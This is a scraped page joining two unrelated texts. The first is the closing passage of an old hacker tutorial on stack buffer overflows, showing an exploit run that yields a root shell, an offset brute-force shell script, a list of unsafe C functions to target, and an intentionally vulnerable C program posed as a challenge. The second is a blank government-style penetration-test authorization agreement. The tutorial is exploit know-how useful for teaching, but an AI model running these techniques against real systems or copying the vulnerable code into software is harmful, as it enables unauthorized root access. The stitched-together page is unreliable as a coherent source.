And again nothing, now lets try a negative offset.

[root@daveli whiz]# ./expl1 228 -5
exploit voor vuln1 volgens het whizkunde artikel
Coded by The Itch / BsE
Using return address: 0xbffffa01
stack pointer: 0xbffff9f4
Using buffersize: 228
strcpy() uitgevoerd...
sh-2.03#

BAMM, jackpot!! Our return address was 5 bytes more of the stack pointer.
I say off, and not less, because the stack grows downwards.

Alas, this is not the same on every computer, so it could be that in
your case the offset of -5 bytes doesnt work. (in my case the return
address of the shellcode lies around the address: 0xbffffa00).

In some rare cases, your offset can be 1000 bytes or more off from
the stack pointer. In those cases it is needed to bruteforce your
right offset. That goes as follows:

<------offsetbruteforce.sh----------------

#!/bin/sh
OFFSET=1
while test $OFFSET -lt 10000
do
./expl1 228 $OFFSET
OFFSET=`expr $OFFSET + 1`
done

<-----offsetbruteforce.sh----------------

If you didnt get a sh-2.03# shell like me, it is time for you to
bruteforce ;)

Just run ./offsetbruteforce.sh and have some patience. If, after a
while you still dont get a shell, edit then expl1.c (your exploit) and
change addr = getsp() - offset; into: addr = getsp() + offset;
and recompile your exploit and rerun offsetbruteforce.sh.

If you want to exploit programs from other people, you have to look
for functions that dont do bounds checking like strcpy(), but
strcat(), sprintf(), vsprintf(), gets() also dont do bounds checking.

In my next article i will try to explain how we exploit programs that
have a too small buffer to place shellcode in. But for now, it has
been enough. I think you can spent some time on this article to
figure out more yourself.

And, if you think you know how stack based buffer overflows work, I
challenge you to exploit the next program successfully.

ps: for more shellcode see: http://bse.die.ms/~itchie/stuff/exploits/shellcode.h

<---------------vuln2.c-----------------------
/* vuln2.c for my article about stack based buffer overflows
* exploit this one yourself successfull! ;-)
*
* Coded by The Itch / BsE
* root@bse.die.ms
* http://bse.die.ms
*/

#include
#include
#include

int main(int argc, char *argv[])
{
char buffer[512];
char *buf2;

if(argc < 2)
{
printf("syntax: %s \n\n", argv[0]);
exit(0);
}

if(getenv("TEST") == 0)
{
printf("error, no enviromental string found!\n");
printf("Aborting program...\n\n");
exit(0);
}

buf2 = getenv("TEST");
strcpy(buffer, buf2);
printf("Using enviromental string: %s\n", buf2);

return 0;
}

/* Remember, there is no cure for BsE */

<------------vuln2.c------------------


greetings,
The_Itch
root@bse.die.ms
http://bse.die.ms

irc.axenet.org - #axenet

_____________________________________________________________________
§=------------------------------]-§-[------------------------------=§
\\ THIS FILE WAS SUBMITTED TO SOLDIERX //
\\ http://www.soldierx.com //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§

Read More

ETHICAL HACKING AGREEMENT

ETHICAL HACKING AGREEMENT

External Network Security – Unannounced Penetration Test

FACILITY: _____________________________________

DATE: _________________________________________

OBJECTIVE: To provide an assessment of the site’s external security profile of networked computer systems and intrusion detection capabilities.

SCENARIO: Testing will consist of four phases, during which various tools and techniques will be used to gain information and identify vulnerabilities associated with the site’s computer systems and subsequent attempts to penetrate the network. These phases, discussed in detail below are: network mapping; vulnerability identification; exploitation; and reporting.

Network Mapping
will obtain much of the required information regarding the
site’s network profile, such as IP address ranges, telephone number ranges, and
other general network topology through public information sources, such as
Internet registration services, web pages, and telephone directories. More
detailed information about the site’s network architecture will be obtained
through the use of domain name server (DNS) queries, ping sweeps, port scans,
and connection route tracing. Informal inquiries, not linked to Independent
Oversight, may also be attempted to gather information from users and
administrators that could assist in gaining access to network resources. Once
this general network information is compiled and analyzed,
will begin identification of individual system vulnerabilities.

Vulnerability Identification
During this phase, will attempt to associate operating
systems and applications with identified computers on the network. Depending
upon network architecture, this may be accomplished using automated tools, such
as nmap and queso, or using manual techniques, such as telnet, ftp, or sendmail
login banners. Using this information, will create a list
of probable vulnerabilities associated with each potential target system. Also,
at this point, automated scripts will be developed or compiled to attempt
exploitation of vulnerabilities.

Exploitation
During this phase, system and user information will be used to attack the
authentication processes of the target systems. Example attack scenarios in this
phase include, but are not limited to: buffer overflows, application or system
configuration problems, modems, routing issues, DNS attacks, address spoofing,
share access and exploitation of inherent system trust relationships. Potential
vulnerabilities will be systematically tested in the order of penetration and
detection probability as determined by the members of the
penetration testing team. The strength of captured password files will be tested
using password-cracking tools. Individual user account passwords may also be
tested using dictionary-based, automated login scripts. In the event that an
account is compromised, will attempt to elevate privileges
to that of super user, root, or administrator level.

Since the goal of testing is to determine the extent of
vulnerabilities, and not simply penetrate a single site system, information
discovered on one system may be used to gain access to additional systems that
may be "trusted" by the compromised system. Additionally, host-level
vulnerabilities may be exploited to elevate privileges within the compromised
system to install "sniffers" or other utilities. will
insert a small text file at the highest level directory of each compromised
system. In those cases where is unable to gain sufficient
privilege to write to the system, a file will be copied from the system. In
either case, additional files may be copied during testing if further review is
required to determine sensitivity of information contained on the system.
will maintain detailed records of all attempts to exploit
vulnerabilities and activities conducted during the attack phase.

Reporting
will provide an on-site briefing of results. These results
will also be documented in a management level report provided to the site,
Operations Office, and responsible Headquarters Program Offices that will cover
the unannounced penetration testing. Specific details on vulnerabilities will
also be provided to site technical personnel.

SPECIAL CONSIDERATIONS:
will coordinate testing activities with a "trusted
agent" in each organization listed on the performance test agreement as
appropriate. Each organization should identify an individual to be designated
as a trusted agent. More than one trusted agent may be identified at the site,
however, the number should be kept to an absolute minimum. All personnel who
are informed of the testing will maintain strict confidentiality to ensure the
validity of test results.

The Operations Office will coordinate with trusted agents at the site to
identify critical systems that should be excluded from testing activities
(e.g., safety systems, major applications undergoing upgrades or other special
evolutions). Specific network addresses and reasons for exclusion should be
provided as an attachment to the signed performance test.
The Operations Office will identify any systems or network nodes that are
connected to the site network, but are not under the direct control and
responsibility of the site or the cognizant Operations Office. These systems
will be excluded from testing unless obtains permission
from the system owner.

will provide the DOE Computer Incident Advisory
Capability (CIAC) with information regarding the systems used for scanning and
testing activities to ensure that testing activities are not confused with
real attacks.

While will not attempt to exploit "denial of service"
vulnerabilities (unless specifically requested by competent authority) and
every attempt will be made to prevent damage to any information system and the
data it holds, some penetration attempt scenarios have the possibility of
causing service interruption. In the unlikely event that such an event occurs,
will work with the trusted agents at the site to
determine the nature of the problem and restore the system to its desired
state of operation.

All information obtained by will be protected (to the
extent possible) from unauthorized access.

In the event that any site personnel (excluding trusted agents) identify
testing activities, site computer security personnel
should document the detection of activity and take initial actions that would
be taken in the case of a real intrusion, including informing CIAC. If
notified by the site of incidents that correspond with OA penetration testing,
CIAC and the site’s trusted agents will inform the appropriate site computer
security personnel that the activity identified is part of an authorized DOE
test. OA will also be informed of the detection. In these cases, logs or other
evidence of intrusion detection activities should be provided to Independent
Oversight for analysis. testing will then be allowed to
continue as an announced external network security assessment without
blocking, filtering, or restricting access.

It is the site’s responsibility to restore network computer systems to a
secure configuration after testing. Independent
Oversight will coordinate with and provide assistance (as requested) to system
administrators during this period of "cleaning up" network computer systems.
Clean-up may consist of removing added programs and files, identifying systems
whose password files were compromised, and restoring systems to a secure
configuration so that no systems are left in a compromised condition.
As evidenced by their signature on this performance test agreement, Operations
Office and site contractor representatives certify that the Department’s
Banner and Warning Policy has been implemented at the site and network
computer users have, as a result, granted constructive consent to this type of
activity.


APPROVALS:

______________________________________________________________
Director, Office of Cyber Security and Special Reviews

______________________________________________________________
Office of Chief Information Officer Representative

______________________________________________________________
Lead Program Secretarial Office Representative

______________________________________________________________
Operations Office Representative

______________________________________________________________
Site Contractor Representative

Read More